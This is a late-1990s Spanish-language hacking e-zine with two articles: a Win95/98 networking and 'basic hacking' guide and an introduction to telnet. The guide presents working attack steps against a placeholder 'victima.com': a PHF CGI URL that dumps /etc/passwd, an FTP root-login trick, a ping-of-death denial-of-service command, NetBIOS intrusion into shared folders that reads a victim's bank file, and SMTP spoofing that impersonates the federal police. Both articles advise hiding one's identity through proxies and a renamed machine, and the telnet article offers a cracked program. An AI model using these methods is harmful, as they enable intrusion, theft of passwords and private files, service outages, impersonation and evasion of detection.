  Proteger nuestro win95/98 es cosa de cada uno , pero tranquilos que esto no es
  muy difícil...

  *. Protocolo TCP/IP y Demas yerbas..
  =====================================

  El protocolo TCP/IP, es el mas usado y seguramente ya lo sabias, ya que
  engloba casi todos los servicios que solemos usar como por ejemplo cuando
  hacemos telnet, mail, ftp o cualquier cosa.

  TCP/IP proviene de Transmission Control Protocol y Internet Protocol
  respectivamente. Por suerte para los usuarios de win95/98, este protocolo
  ya viene incorporado nativamente en el sistema, al contrario que ocurria
  con el windows 3.x, el cual lo teniamos que instalar para poder conectar
  a Internet.

  Como habran visto son en realidad son 2 protocolos pero que estan
  unidos, el primero o sea el TCP es el encargado de las comunicaciones y de
  la transmision de los paquetes cuando estamos conectados a un servidor. El
  IP es el encargado de que los paquetes llegen a destino por orden aunque
  tomen caminos diferentes.

 A continuación les hice un pequeño diagrama, simplificando como funcionan estos
 protocolos:

                     * Diagrama del TCP *   

        cliente ->  El cliente le envia una  -> servidor
                    solicitud de conexion
                    espeficicando el puerto
                    de conexion al servidor.

        cliente <-  El servidor le responde  <- servidor
                    que conoce su peticion
                    de conexion.

        cliente ->  El cliente le devuelve   <- servidor
                    otra vez la peticion y
                    el circuito ya esta
                    abierto.

                     * Diagrama del IP *

       Informacion general - Direccion IP - Direccion IP - Datos 
       de cabezera.- de origen - de destino.

  Bueno, esto es un pequeño resumen de la forma en que trabaja el protocolo
  TCP/IP, espero que les sea util.
  

  * FTP.
  ==========

  Supongo que a estas alturas sabran lo que es el FTP, File Transfer Protocol
  o sea Protocolo de Transferencia de Ficheros y para los que no lo saben el puerto
  asignado para este servicio es el puerto 21. Este servicio hay que
  conocerlo muy bien ya que ademas de que nos sirve para subir o bajar ficheros
  tambien nos puede ayuda en nuestros propositos , por supuesto el hacking.

  Si no tienen ningún cliente de FTP, hay uno disponible dentro de win95/98,
  el unico problema es que no es muy vistoso ya que funciona en modo
  MS-DOS pero es muy versatil y perfecto para nosotros. Para ejecutarlo basta
  que activemos una ventana MS-DOS y en la linea de comados escribamos FTP y
  se pondra en modo FTP. Un ejemplo seria esto:

  c:\>ftp   <- Escribimos FTP.

  ftp>      <- activado el modo FTP.

  Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los
  comandos disponibles del FTP, eso se los dejo para que lo averigüen solos porque sino
  esto se aria demasiado largo :-)



  
*. Hacking Basico En Windows. 
  ===============================

  Bueno por fin se terminaron las descripciones y definiciones de las herramientas
  que utilizaremos.
  En esta seccion les explicare varias maneras de hacking usando el win95/98 pelado, o sea,
  sin utilizar ninguna herramienta extra.

  *. Phf.
  =========

  La primera tecnica ya es muy conocida y la verdad es que tendremos suerte
  si nos funciona, ya que se utilizaba hace ya varios años debido a un bug en los
  servidores que usaban unix...a lo mejor a esta altura y es casi seguro, todos esos
  servidores deben de estar parchados...pero vale la pena nombrarlo ya que siempre hay
  uno que otro descuidado..
  Para que esto nos funcione solo tenemos que tener un navegador instalado
  en nuesto win95/98, por defecto suele venir el IE.

  Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que
  corra sobre unix (muchos). Conectamos con un servidor en cuestion,
  www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le
  añadimos:

  http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

  Bueno, como les dije antes si todo sale bien nos aparecera el fichero de passwords
  del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto
  el PHF tiene muchas variantes por eso les aconsejo que busquen algo que
  profundice en esta tecnica al igual que tambien buscar informacion sobre
  el fichero passwd de unix para comprenderlo.

  *. Ftp en uso.
  ===============
  Antes ya les he explicado el funcionamiento del FTP de win95/98, ahora lo
  usaremos para sacer el fichero de password de un servidor. Desde una
  ventana del MS-DOS llamamos al programa FTP y escribimos:

  ftp> open victima.com
  Conect to victima.com
  220 victim.com FTP server ready.

  ftp> quote user ftp
  331 Guest login ok, send ident as password.

  ftp> quote cwd ~root
  530 Please login with USER and PASS.

  ftp> quote pass ftp
  230 Guest login ok, access restrictions apply.

  ftp> ls (o lo que querramos)

  Y como siempre es el caso si todo sale bien estaremos metidos en el
  sistema como root (en lenguaje unix significa el superusuario, o sea el
  que controla el servidor). Por desgracia esta tecnica es muy antigua por
  lo que mas seguro no funcionara pero todo es posible.

  *. Ping De La Muerte.
  ==========================

  Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir
  Cracker para no ofender a nadie), ya que unicamente sirve para tirar un
  servidor o sea que se desconecta de Internet y esto puede representar
  grandes perdidas a una empresa. Con esto solo les quiero decir que aunque
  aqui se los explicare no es cuestion que lo usen por Internet atacando
  servidores, aunque aca en argentina nuestra lamentable coneccion no nos permitiria
  tirar nada de nada...si tienes una coneccion por cable, o simplemente una coneccion
  como la gente te puede llegar a funcionar.

  La utilidad Ping sirve principalmente para saber si un servidor esta activo
  y ademas podemos calcular el trafico en la red segun el tiempo de su
  respuesta. Basicamente se le envia un paquete a un servidor y este nos
  contesta, solo que si se le envia un paquete muy grande puede llegar
  desordenado, por lo que el servidor pide al origen que le vuelva a enviar
  una parte o la totalidad del paquete, por lo que se produce un datagrama
  del ping muy grande y producira su caida. Para ejecutar este ataque solo
  tenemos que escribir :

  c:\>ping -l 65510 victima.com 

  Esta simple linea es muy destructiva, por lo que tengan cuidado antes de hacer
  alguna boludez, si es que esto les funciona, como se los dije antes depende mucho
  de nuestra velocidad de coneccion.

  *. Recursos Compartidos.
  =========================== 
  Como win95/98 NO tiene seguridad nos permite meternos en el disco duro de
  otra persona por Internet y lo mejor del caso es que esta tecnica nos la
  proporciona los propios programas del win95/98. Por supuesto no todo es tan
  sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala
  configuracion del propio usuario al no configurar adecuadamente los
  recursos compartidos de su red corriendo sobre win95/98.

  Para meternos en el HD de otra PC debemos tener nuestra PC bien configurado, 
  o sea el compartir recursos bien puesto y tambien tener el Netbios instalado. 
  Para configurarlo, tenemos que tener activado la opcion de "compartir ficheros e 
  impresoras" en MIPC->Panel de Control->Red.
  SI por el caso la opcion esta desactivada simplemente pulsamos el boton de
  "añadir" y añadimos el servicio "Compartir ficheros e impresoras en redes
  Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion"
  en "Cliente para redes Microsoft". Tambien tiene que estar activado el
  "Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso
  Telefonico a Redes->Conexion a Internet que usaremos->boton derecho->
  propiedades, debiendo estar activada la casilla "conectarse a la red".

  Ahora ya podemos ponernos manos a la obra, entonces volvemos a una
  ventana del MS-DOS y ejecutamos:

  c:\>nbtstat -A (IP DE LA VICTIMA)
 
    NetBIOS Remote Machine Name Table

    Name               Type         Status
    ---------------------------------------------
    VICTIMAMACHINE    <00>    UNIQUE     Registered
    VICTIMAGROUP      <00>    GROUP      Registered
    VICTIMAMACHINE    <03>    UNIQUE     Registered
    VICTIMAMACHINE    <20>    UNIQUE     Registered
    VICTIMAGROUP      <1E>    GROUP      Registered

    MAC Address = 44-45-53-54-00-00

  Cuando ejecutamos este comando nos saldra una tabla como esta y el
  primer 'UNIQUE' de tipo <00> es el nombre de la victima y como pueden
  ver la maquina se llama VICTIMAMACHINE.

  Entonces ahora creamos/editamos el archivo LMHOSTS, (si por el caso
  encuentran uno que pone LMHOSTS.SAM no lo toquen), poniendo la direccion IP
  y el nombre de la maquina en cuestion, esto seria de la siguiente forma:

  c:\>edit c:\windows\system32\LMHOSTS

    VICTIMAMACHINE

  Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos
  un comando para añadir el ordenador de la victima a nuestro Netbios y
  esto seria de la siguiente forma:
  
  c:\>NBTSTAT -R

  Ahora nos interesa saber que recursos comparte la victima y esto tampoco
  es muy dificil de hacer:

  c:\>net view \\VICTIMAMACHINE

   Shared resources at \\VICTIMAMACHINE

   Sharename    Type         Comment
   -----------------------------------------
   BANCO        Disk

  Y como podemos observar comparte una carpeta llamada BANCO.

  Ahora ya podemos operar como si fuese una terminal mas en nuestra red local
  sobre win95/98. Ya solo nos queda ejecutar el comando que querramos, si por
  ejemplo queremos ver el contenido, solo tenemos que escribir:

  c:\> dir \\VICTIMAMACHINE\BANCO

  O para leer cualquier fichero de la carpeta:

  c:\> type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT

  Si queremos conectar al recurso compartido de forma grafica (o sea con
  una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar
  INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible
  si hemos añadido la VICTIMAMACHINE a una unidad de red a la que podamos
  llamar, deberemos ejecutar:

  c:\>NET USE e: \\MIPC\WINDOWS

  Esta tecnica solo funciona si la maquina remota ejecuta win95/98 o win 3.11
  y ademas comparte las carpetas sin contraseña en modo "Acceso a nivel
  compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase
  el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en
  esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina
  para que este autorizada, esto lo conseguiremos con el Regedit, por
  desgracia los sistemas win95/98 y OSR2 que estan ejecutando el Servidor Web
  Personal de Microsoft desactivan esta posibilidad de acceso remoto tras
  informar de la conveniencia de hacerlo al usuario, ya que el servidor web
  obliga a compartir carpetas aun sin tener red local.

  Logicamente un usuario que haya tenido el error de conectarse a Internet
  con carpetas compartidas no toma luego medidas de control sobre quien
  entra en su maquina. Pero no hay que hacerse ilusiones ya que podemos ser
  pillados si por ejemplo un usuario ejecuta el programa Netwatch, que
  muestra los usuarios conectados a nuestra computadora en cada momento y por
  supuesto el nombre de las computadoras por lo que es aconsejable cambiar el
  nombre de nuestra computadora usando el Regedit. Si nuestra maquina se
  llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con
  el Regedit a un nombre menos sospechoso.

  Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra
  computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos
  una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se
  dara cuenta de nuestra entrada. Tambien hay que decir que si la
  VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo
  "hay otros usuarios conectados a su ordenador, si apaga se desconectaran"
  si ocurre esto seremos pillados.

  Decir que el comando Net, dispone de muchos parametros que nos puede ser
  utiles y ademas podemos jugar durante mucho tiempo con ellos, los cuales
  son los siguientes:

  c:\>net /?

  For more information about a specific Microsoft NET
  command, type the command name followed by /?
  (for example, NET VIEW /?).

  NET CONFIG   Displays your current workgroup settings.
  NET DIAG     Runs the Microsoft Network Diagnostics program to
               display diagnostic information about your network.
  NET HELP     Provides information about commands and
               error messages.
  NET INIT     Loads protocol and network-adapter drivers without
               binding them to Protocol Manager.
  NET LOGOFF   Breaks the connection between your computer and
               the shared resources to which it is connected.
  NET LOGON    Identifies you as a member of a workgroup.
  NET PASSWORD Changes your logon password.
  NET PRINT    Displays information about print queues
               and controls print jobs.
  NET START    Starts services.
  NET STOP     Stops services.
  NET TIME     Displays the time on or synchronizes your computer's
               clock with the clock on a Microsoft Windows for
               Workgroups, Windows NT, Windows 95, or NetWare time server.
  NET USE      Connects to or disconnects from a shared
               resource or displays information about
               connections.
  NET VER      Displays the type and version number of the
               workgroup redirector you are using.
  NET VIEW     Displays a list of computers that share
               resources or a list of shared resources
               on a specific computer.
  The command was completed successfully.

  Bueno aqui tienen todos los comandos disponibles usan NET.

  ¡¡¡ACLARACION!!!: "El comando net no viene disponible en win95/98 de fabrica, si lo traen
  los win/NT, por lo que hay que coseguir alguna maquina que corra este sistema operativo
  y copiar el comando NET, y ponerlo en nuestra PC para poder utilizarlo."

  *. Fake Mail Con El Telnet.
  ===============================

  Esta tecnica nos ayuda a suplantar la direccion de correo electronica que
  querramos. La verdad es que tiene pocos usos, en mi opinion debido a
  una serie de razones pero siempre puede servir para gastar una buena
  broma enviando a un amigo un mail del director de la Universidad diciendo
  que ha sido expulsado por pirata y no te cuento si es un mail de la
  Policia Federal, jeje.

  La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar
  unas ciertas medidas de seguridad, que ya explicare mas adelante. Lo primero
  que tenemos que hacer es ejecutar el servicio de Telnet (sobre el manejo del
  Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de poner
  el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos
  a que nos conectemos a ese puerto, cuando conectemos nos saldra un
  mensaje y esta esperando a que pulsemos alguna tecla:

    220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
    [d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT) 

  Muchas veces lo que podemos hacer es escribir "help" y saldran todos los
  comandos, tambien podemos escribir "echo" y la maquina nos contestara que
  esta lista. Para escribir un mail hay que seguir una serie de pasos:

   mail from:policia_federal@arnet.com.ar <- ponemos de donde viene.

  El servidor nos contesta:

   250 <policia_federal@arnet.com.ar> ... Sender Okay 

  Ahora escribimos:

   rcpt to:the_lynx@mixmail.com <- a quien se lo enviamos.

  El servidor nos contesta:
 
   250 <the_lynx@mixmail.com> ... Recipiant Okay 

 Ahora escribimos:

   data 

  El servidor nos contesta:

   354 Enter mail, end with "." on a line by itself 

  Ahora escribimos:

   To: the_lynx@mixmail.com
   From: policia_federal@arnet.com.ar
   Subject: Te pillamos!!!

   Bueno lynx, solo te queremos decir que nos gusta tu trabajo y te
   querremos fichar para el departamento.
                                              Policia Federal Argentina.
   .  <- para terminar el mail.
 
  El servidor nos contesta:

   250 Mail accepted 

  Ahora escribimos:

   quit  <- ya esta todo listo 

  Como veran es realmente simple!! Pero antes de empezar a jugar con
  esta tecnica tenemos que asegurarnos que el servidor de mail no registra
  nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a
  alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail
  sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet
  sobre servidores que permiten hacer esto.

  *. Finger.
  ==============
  La utilidad Finger, muy usada en Unix, en realidad no esta disponible en Win95/98 
  pero como somos Hackers nosotros si que somos capaces de hacer esto desde
  Win95/98. Finger se utiliza para obtener informacion de un servidor. Puede
  parecer una tonteria pero es util, por ejemplo, podemos empezar a sacar los
  Login's de los usuarios y empezar a adivinar sus passwords, tambien podemos
  vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la
  ultima vez que estuvo, etc...) y asi muchas cosas.

  La verdad es que para usar el Finger usaremos cualquier navegador, IE o
  Netscape. Simplemete nos dirigimos a un url un poco especial, es un web
  que permite hacer Finger a cualquier host y nos deveulve los resultados.
  Esto se conoce como "Finger Gateway". El url del web es:

  http://www.hgp.med.umich.edu/cgi-bin/finger
   
  *. Whois.
  ============
  La utilidad Whois, al igual que Finger es muy comun en Unix y no esta
  disponible en Win95/98 pero comos somos asi de buenos todo podemos hacer.
  Tambien sirve para pedir informacion de un servidor pero no el igual que
  Finger, ya que se diferencian en el tipo de informacion, el finger se suele
  utilizar mucho para buscar direcciones de correo mientras que el Whois,
  para averiguar informacion sobre un servidor en si mismo.

  Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un
  host muy especial:

  c:\>telnet whois.nic.ar

  Por supuesto nic, es la encargada de suministrar los dominios argentinos
  en internet y podemos usar su base de datos para pedir informacion sobre un servidor.

  Cuando conectemos a la base de datos de NIC, escribimos "Whois nombre_
  del_servidor" y nos sacara la informacion.

   telnet InterNIC > whois arnet.com.ar
   Connecting to the rs Database . . . . . .
   Connected to the rs Database
   Arnet (arnet-DOM)
   12100 Sunrise Valley Drive
   Bs As, (direccion registrada por arnet, por ej: Rivadavia 230..)
   Argentina <- Pais de origen del servidor

   Domain Name: Arnet.com.ar <- Nombre del dominio

   Administrative Contact: <- Informacion sobre quien es contacto administrativo de ese servidor.          
      Mariachi, Loko (jhg45) mloko@tota.com.ar
      011-458248   
                               
   Technical Contact, Zone Contact: <-Informacio sobre el servicio tecinico registrado.

      Arnet  (Arnet-NOC)  Tecnico@arnet.oom.ar
      011-489547

   Billing Contact: <- No tengo idea que hace el que aparece aqui :-)

      Pepe, Pepito  (JB4302)  pepitin@arnet.com.ar
      011-452156 (FAX) 011-457895

   Record last updated on 13-Mar-97.
   Record created on 22-Jun-95.

   Domain servers in listed order:

   DNS-01.arnet.com.ar              152.163.199.42
   DNS-02.arnet.com.ar              152.163.199.56
   DNS-arnet.ans.net                198.83.210.28
  
  Como vemos e pedido informacion sobre arnet.com.ar, unos de los ISP de Argentina. Y esto
  es lo que nos ha dado NiC. Al final podemos ver los dominios
  asociados a Arnet. Pues sencillo y muy util, el whois.

  !NOTA!:" Obviamente los datos puestos arriba son inventos mios, pero algo asi es lo que les      saldra"
                                                     
  *. Tracert.
  ================

  Esta utilidad que si esta implementada en Win95/98, nos sirve para calcular
  el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos
  saber por cuantos servidores pasa. Muy util para sacar posibles servidores
  victimas si nos llaman la atencion.

  Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert,
  a secas y nos sacara el menu de opciones disponible.

  c:\>tracert

  Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

  Options:
       -d                 Do not resolve addresses to hostnames.
       -h maximum_hops    Maximum number of hops to search for target.
       -j host-list       Loose source route along host-list.
       -w timeout         Wait timeout milliseconds for each reply.

  Como veran, no tiene ningun misterio las opciones del Tracert, por
  lo que ya aprenderan su uso con la experiencia. Ahora escribimos una
  direccion IP cuando llamamos al Tracert, de la siguente forma:

  c:\>tracert 198.83.210.28

  Tracing route to dns-aol.ans.net [198.83.210.28]
  over a maximum of 30 hops:

  1   *        *        *     Request timed out.
  2 138 ms  145 ms  135 ms 204.134.78.201
  3 212 ms  191 ms  181 ms glory-cyberport.nm.westnet.net [204.134.78.33]
  4 166 ms  228 ms  189 ms enss365.nm.org [129.121.1.3]
  5 148 ms  138 ms  177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]
  6 284 ms  296 ms  178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]
  7 298 ms  279 ms  277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
  8 238 ms  234 ms  263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]
  9 301 ms  257 ms  250 ms dns-aol.ans.net [198.83.210.28]

  Trace complete.
  
  Aqui podemos ver por todos lo sitios que ha pasado el paquete que hemos enviado
  al IP 198.83.210.28. Y asi podemos hacer con todos los servidores de Internet.

  *. Winipcfg.
  ===============

  Ejecutando este comando, nos saldra una ventana de windows informandonos de
  los diferentes valores de nuestra red. Realmente util para verificar la
  configuracion.

  *. Ipconfig.
  ===============

  Este programa es similar al anterior descripto pero funciona en modo MS-DOS.
  Al igual que el winipcfg nos sirve para verificar la configuracion de nuestra red. 
  Por ejemplo, lo ejecutamos asi:

  C:\WINDOWS>ipconfig

  Windows 98 IP Configuration

  0 Ethernet adapter :

          IP Address. . . . . . . . . : 0.0.0.0
          Subnet Mask . . . . . . . . : 0.0.0.0
          Default Gateway . . . . . . :

  Aclaro que en la computadora donde estoy escribiendo este articulo, no lo
  tengo en estos momentos en red, por eso no lo tengo configurado. Para pedir
  las diferentes opciones, ejecutamos:

  C:\WINDOWS>ipconfig -h
  Windows 98 IP Configuration
  Command line options:
  /All - Display detailed information.
  /Batch [file] - Write to file or ./WINIPCFG.OUT
  /renew_all    - Renew   all adapters.
  /release_all  - Release all adapters.
  /renew   N    - Renew   adapter N.
  /release N    - Release adapter N.

  No veo la necesidad de traducir esto debido a que es realmente facil, en
  caso de no entender nada, aprende ingles :) Pero la que mas nos puede
  interesar es la opcion /All.

  *. Arp.
  ==========

  Ejecutamos este comando para que nos muestre o para modificar nuestra IP
  en nuestra red, mantenida por un servidor Windows NT. Por ejemplo:

  C:\WINDOWS>arp

  Displays and modifies the IP-to-Physical address translation tables used by
  address resolution protocol (ARP).

  ARP -s inet_addr eth_addr [if_addr]
  ARP -d inet_addr [if_addr]
  ARP -a [inet_addr] [-N if_addr]

    -a        Displays current ARP entries by interrogating the current
              protocol data.  If inet_addr is specified, the IP anD     		  Physical addresses for only the specified computer are 		  displayed. If more than one network interface uses ARP, 		  entries for each ARP table are displayed.
    
    -g          Same as -a.
    
    inet_addr   Specifies an internet address.
    
    -N if_addr  Displays the ARP entries for the network interface specified
                by if_addr.
    -d          Deletes the host specified by inet_addr.
    -s          Adds the host and associates the Internet address inet_addr
                with the Physical address eth_addr.  The Physical address is
                given as 6 hexadecimal bytes separated by hyphens. The entry
                is permanent.
    eth_addr    Specifies a physical address.
    if_addr     If present, this specifies the Internet address of the
                interface whose address translation table should be modified.
                If not present, the first applicable interface will be used.
  Example:

 > arp -s 157.55.85.212   00-aa-00-62-c6-09  .... Adds a static entry.
    
 > arp -a                                    .... Displays the arp table.

  Y como viene siendo habitual, los remito a aprender ingles y a jugar con las
  distintos parametros que tiene este comando.

  *. Route.
  ==============

  Este comando nos permitira manejar la tabla local TCP/IP. Al igual que los
  demas comandos dispone de varios parametros, los cuales son los siguientes:

  C:\WINDOWS>route

  Manipulates network routing tables.

  ROUTE [-f] [command [destination] [MASK netmask] [gateway] [METRIC metric]]

    -f           Clears the routing tables of all gateway entries.  If this is
                 used in conjunction with one of the commands, the tables are
                 cleared prior to running the command.

    command      Must be one of four:
                   PRINT     Prints   a  route
                   ADD       Adds     a  route
                   DELETE    Deletes  a  route
                   CHANGE    Modifies an existing route

    destination  Specifies the destination host.

    MASK         Specifies that the next parameter is the 'netmask' value.

    netmask      Specifies a subnet mask value to be associated
                 with this route entry. If not specified, it defaults to
                 255.255.255.255.

    gateway      Specifies gateway.

    METRIC       Specifies that the next paramenter 'metric' is the
                 cost for this destination

  All symbolic names used for destination are looked up in the network
  database file NETWORKS. The symbolic names for gateway are looked up in the
  host name database file HOSTS.

  If the command is PRINT or DELETE, wildcards may be used for the destination
  and gateway, or the gateway argument may be omitted.
  Diagnostic Notes:
      Invalid MASK generates an error, that is when (DEST & MASK) != DEST.
      Example> route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1
               The route addition failed: 87

  Examples:

      > route PRINT
      > route   ADD 157.0.0.0     MASK 255.0.0.0   157.55.80.1 METRIC  3
                    ^destination       ^mask       ^gateway            ^metric
      > route PRINT
      > route DELETE 157.0.0.0
      > route PRINT

  Creo que queda bastante claro, incluso provee distintos ejemplos para
  familiarizarnos con este comando.

  *. Netstat.
  ===============

  Este comando nos puede ser muy util para saber que conexiones tenemos
  activas en el momento de ejecutar este comando, para conexiones TCP/IP, lo
  ejecutamos asi, solo que en mi caso no saldra ya que no estoy conectado en
  este momento:

  C:\WINDOWS>netstat

  Active Connections

    Proto  Local Address          Foreign Address        State

  Como ven no sale nada, pero si lo ejecutan cuando estan conectados, podran
  ver bien como es. Como siempre este comando dispone de varios parametros, que son
  los siguientes:

  C:\WINDOWS>netstat /?

  Displays protocol statistics and current TCP/IP network connections.

  NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

    -a          Displays all connections and listening ports.
    -e          Displays Ethernet statistics. This may be combined with the -s
                option.
    -n          Displays addresses and port numbers in numerical form.
    -p proto    Shows connections for the protocol specified by proto; proto
                may be TCP or UDP.  If used with the -s option to display
                per-protocol statistics, proto may be TCP, UDP, or IP.
    -r          Displays the routing table.
    -s          Displays per-protocol statistics.  By default, statistics are
                shown for TCP, UDP and IP; the -p option may be used to
                specify a subset of the default.
    interval    Redisplays selected statistics, pausing interval seconds
                between each display.  Press CTRL+C to stop redisplaying
                statistics.  If omitted, netstat will print the current
                configuration information once.

  Ya solo nos queda jugar con los distintos parametros y aprender.

 Bueno este es el final de mi articulo, espero que les sea util aunque no deben quedarse
 solo con esto y buscar mas informacion, yo solo les di lo basico como para empezar.
 Y recuerden que si quieren ser hackers de verdad....con windows no sirve..usen
 !!LINUX!!!. 


 Si surgen algunas dudas sobre lo aqui expuesto, pueden consultarmelo a mi correo    "the_lynx@mixmail.com" o por icq #50704972.


 ¡Chau y hasta el proximo numero de DATACODE.!





								          L¥NX
								   the_lynx@mixmail.com






                      *************************************************
                      *************Introduccion al telnet**************
                      *************************************************
                      ******************Por K0P1K47******************** 
                      *************************************************




1-¿Qué es Telnet?
  ===============
 
	Telnet es un conjunto de protocolos (reglas)  que permiten que dos computadoras se conecten entre si, es decir que intercambien información. Al conectarse a un servidor mediante Telnet (comunmente utilizando el puerto 23), nuestra computadora pasa a ser una terminal del servidor al cual nos conectamos. Ésto significa que las órdenes que demos se ejecutarán en él y no en nuestra máquina, por lo tanto nos es posible correr aplicaciones que el servidor posee sin utilizar recursos de nuestra computadora (solo los utilizados por el modem para la conexión). Es la esencia del hacking, ya que nos permite controlar una computadora como si estuviéramos enfrente de ella (siempre y cuando obtengamos los accesos necesarios).



2-¿Qué se necesita para conectarse?
  =================================
  Lo primero a hacer es conseguir una "shell account" (cuenta shell), una cuenta en un servidor Unix que nos pemita encubrir nuestra identidad y así trabajar tranquilamente sin ser atrapados. Esto no es estrictamente necesario, sólo debe aplicarse si se piensa utilizar Telnet con fines malignos. Se puede conseguir una "shell account" gratuita en los siguientes sitios:
- http://www.cyberspace.org/shell.html
- http://www.grex.org/
- http://www.arbornet.org/projects.html
- http://www.nyx.net/
- http://www.nether.net/
Otra buena medida a tomar en cuanto a seguridad se refiere, es esconderse detrás de un servidor Proxy. Esto será muy útil en caso de que el servidor que nos proporciona la "shell account" guarde un log con la informaión de todos los usuarios que se conectaron  y, más aún, si llevan tambien un log de lo que estuvimos haciendo. No se olviden que el proxy al cual se conecten debe tener abierto el puerto 23,  que es el que se utiliza para hacer Telnet (aunque diga que el proxy se puede utilizar sólo mediante un puerto determinado, prueben utilizando el puerto 23). A continuación una lista de sitios dónde se pueden encontrar proxys:
- http://cavency.virtualave.net/proxy/
- http://mvlad.newmail.ru/proxiesn.htm
- http://www.lightspeed.de/irc4all/index.htm
- http://www.magusnet.com/proxy.html
- http://forbidden.net-security.org/htm/misc/proxies.htm
- http://home6.swipnet.se/~w-61609/Proxies.htm
- http://lpwa.com:8000/

 Por último, algo fundamental para poder conectarse es un programa para tal fin. En windows 95-98 se incluye uno pero, como todo lo de Micro$oft, es una porquería. ¿Por qué es una porquería?, porque no nos permite ver lo que estamos escribiendo y tampoco borrrar si cometemos algún error, es decir, no solo tenemos que escribir a ciegas con temor a equivocarnos, ¡sino que tampoco podemos arreglarlo! Por eso es mejor utilizar otro de los miles de programas que andan sueltos por la red, cómo el CRT, el cual les recomiendo y el cual pueden bajar de nuestro sitio (www.sweetdevils.com.ar, sección "downloads") junto al crack necesario para arreglar ese bug molesto conocido como "Trial" o "Bug de los 30 días". 


3-¿Cómo conectarse?
  =================
  Lo primero es la configuración del proxy, en caso de no considerar necesaria esta medida de seguridad, pasen al siguiente paso. De lo contrario, sigan las siguientes indicaciones:
1- Ir a [Mi PC]----> [Panel de Control]----> [Opciones de Internet].
2- Hacer click en la pestaña de [Conexiones], seleccionar la conexión de Internet a usar y hacer click sobre el botón de [Configuración].
3- Habilitar el uso de un servidor proxy haciendo click en [Usar Servidor Proxy].
4- En el cuadro de [Dirección] colocar el nombre completo del proxy a utilizar y, en la casilla contigua, el puerto a utilizar (en éste caso el 23).
5- Salir de [Opciones de Internet] haciendo click en aceptar.
¡Ya está lista la configuración del proxy!
El paso a seguir es conectarnos a nuestra "shell account" mediante Telnet.
Windows: si son fanáticos defensores de Bill y de todas sus creaciones y quieren utilizar el "programa" que les proporciona, hagan lo siguiente:
1- Ir a [Inicio]---->[Ejecutar]. Tipear c:/windows/telnet.exe (o el directorio en el que este la carpeta de windows).
2- Una vez abierto el programa, hagan click en [Conectar]----> [Sistema Remoto...].
3- Ingresen el [Nombre del Host] (Hostname), la dirección que les dieron al subscribirse a la "shell account".
4- En [Puerto], seleccionen [Telnet], y en [Tipo de Terminal], dejen la predeterminada (vt100) a menos que les hallan indicado otra cosa al subscribirse a la "shell account".
5- Hagan click en [Conectar] y listo.

CRT: Este excelente programa no solo nos permite ver lo que escribimos y borrar cualquier error que surja de nuestras estúpidas manos, sino que también posee excelente utilidades, como la posibilidad de ejecutar scripts o establecer atajos de teclado. Su uso no difiere mucho del anterior, sin embargo vamos a detallarlo por las dudas de que alguna persona que no posea más de media neurona quiera leer este e-zine ;).

1- Ir a [Files]----> [Connect]. Una vez allí pueden o crear una nueva sesión y configurar todas sus opciones, o optar por lo más sencillo y menos cansador (no valla ha ser que se "stressen") haciendo click en la pestaña de [Quick Connect] (Conectarse Rápido).

2- Al igual que en el programa de Bill, ingresamos el hostname de nuestra "shell account" y el puerto al que nos conectaremos, el 23. El Tipo de Terminal será el predeterminado (vt100), si quieren cambiar esto, deberan iniciar una sesión y configurarlo mediante [Edit]----> [Emulation].

3- Hagan click en conectar y listo.



4- ¿Cómo conectarse a otra máquina a travéz de una "shell account"?
   ================================================================
 Una vez que nos conectemos a nuestra "shell account" nos pedirá que ingresemos nuestro username y password, ingresamos los datos requeridos y ya estamos listos para trabajar. 
El comando a escribirse para conectarse a el servidor de la víctima es "telnet", y su sintáxis es la suiguiente :
telnet hostdelavictima puerto 
Telnet: ingresando éste comando le ordenamos al server que realize un telnet a otra máquina, es decir, que nos conecte a ella.
HostdelaVictima: aquí ingresamos la dirección de la víctima, ya sea un número IP o un nombre DNS.
Puerto: ingresamos el puerto al cual nos queremos conectar  (a continuación hay una lista de los puertos más comunes).
Por ejemplo, si yo quisiera conectarme al FTP de ciudad.com.ar escribiría lo siguiente:
telnet ciudad.com.ar 21


5-Lista de Puertos.
  ================
9---> Discard Dev/Null : Basura
11---> Systat: Información sobre el estado del sistema.
15---> Netstat: Nos da información, en tiempo real,  sobre las conexiones que realiza el servidor.
21---> FTP (File Transfer Protocol): Transferecnia de archivos.
